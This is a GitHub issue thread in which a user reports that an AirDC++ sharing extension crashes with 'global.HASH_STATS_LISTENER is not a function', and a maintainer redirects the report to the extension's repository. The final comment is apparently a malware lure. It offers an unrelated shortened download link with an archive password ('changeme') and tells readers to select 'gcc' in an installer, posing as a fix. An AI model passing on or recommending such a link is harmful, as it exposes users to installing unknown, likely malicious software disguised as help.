### ISSUE TITLE
🐛 [Bug]: global.HASH_STATS_LISTENER is not a function

### ISSUE THREAD

**Issue by infectormp** [airdcpp/airdcpp-windows#136]
### Prerequisites

- [X] This is not a [support issue or a question](https://github.com/airdcpp/airdcpp-windows/discussions)
- [X] I performed a [cursory search of the issue tracker](https://github.com/airdcpp/airdcpp-windows/issues) to avoid opening a duplicate issue
- [X] I am running the latest version of AirDC++

### Describe the issue

Just got the error in airdc log `Extension airdcpp-advanced-sharing has exited`

### Expected behavior

No errors in log

### Crash log

```shell
TypeError: global.HASH_STATS_LISTENER is not a function
    at t.onShareRefreshCompleted (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:78743)
    at EventEmitter.emit (node:events:519:28)
    at Object.handleMessage (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:7743)
    at u.R [as onmessage] (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:11768)
    at u.o [as dispatchEvent] (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:128671)
    at u.m (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:84149)
    at v.<anonymous> (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:83837)
    at v.emit (node:events:519:28)
    at v.processFrame (C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:101764)
    at C:\work\airdc\Settings\extensions\airdcpp-advanced-sharing\package\dist\main.js:2:97068

Node.js v20.17.0
```

### AirDC++ version and architecture (x86 or x64)

4.22b-38-g9817c

### Operating System name, version and architecture

Windows 11 23H2

**Comment by maksis** [comment]
This is an issue with the extension, so you should post the crash to https://github.com/peps1/airdcpp-advanced-sharing/issues

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
